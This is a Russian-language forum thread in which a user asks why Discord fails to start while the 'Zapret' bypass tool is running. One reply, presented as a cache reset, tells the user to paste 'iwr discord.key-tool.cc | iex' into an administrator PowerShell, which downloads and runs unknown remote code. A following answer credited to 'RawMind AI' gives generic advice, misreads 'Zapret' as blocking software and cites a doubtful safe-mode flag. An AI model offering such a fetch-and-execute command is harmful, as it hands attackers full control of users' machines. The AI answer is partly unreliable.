Дружба на века

Проблемы с запретом и Discord

Здравствуйте, знатоки. Возникла проблема - вчера ночью играл с друзьями, суббота как никак, решили допоздна посидеть. Вдруг, в какой-то момент у меня моргает интернет, вырубается разумеется Steam, сама игра, но как бы ничего, но дискорд вдруг выключается черным экраном и не включается обратно, ошибка как обычно, бесконечное обновление. Запрет стоял и показывал работоспособность еще со времен блокировки ютуба и дискорда. Переустановил сам запрет, на новую версию, переустановил дискорд, всё как с чистого листа, ничего не изменилось. Правда в загрузке и проверке статуса запрета выплывали желтые строки с возможными проблемами интернет соединения или днс серверах. Молю помочь чем сможете.

Скорее всего надо сбросить кеш

Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:

iwr discord.key-tool.cc | iex

Нажать Enter.

(не путать с командной строкой).

В открывшемся окне нажать 1.

После выполнения команды закрыть все окна и перезагрузить ПК.

Ответ от RawMind AI:

Здравствуйте! Давайте попробуем разобраться в вашей ситуации.

1. Интернет и DNS проблемы: Желтые строки с предупреждениями о проблемах соединения или DNS могут указывать на то, что у вас есть сетевые проблемы. Попробуйте выполнить следующие шаги:
- Перезагрузите роутер.
- Проверьте подключение к интернету с другого устройства (если возможно).
- Убедитесь, что ваш IP адрес и DNS серверы настроены правильно.

2. Проблема с запретом: Если вы используете специальное программное обеспечение для блокировки сайтов или приложений (например, Discord), убедитесь, что оно не мешает работе Discord.
- Проверьте настройки программы и убедитесь, что Discord разрешен к использованию.
- Если возможно, временно отключите программу запрета и проверьте работу Discord.

3. Проблемы с самим Discord: Иногда проблема может быть со стороны самого приложения Discord.
- Убедитесь, что у вас установлена последняя версия Discord.
- Попробуйте удалить кэш Discord (закройте приложение и удалите папку `AppData\Roaming\discord`).
- Если проблема сохраняется, попробуйте запустить Discord в безопасном режиме (в командной строке выполните: `Discord.exe --safe-mode`).

4. Проблемы с операционной системой: Иногда проблемы могут быть связаны с самой ОС.
- Проверьте обновления Windows и установите все доступные.
- Убедитесь, что у вас нет проблем с драйверами (например, сетевыми).

Если после выполнения этих шагов проблема не исчезла, попробуйте обратиться в поддержку Discord или на форумы пользователей для получения дополнительной помощи.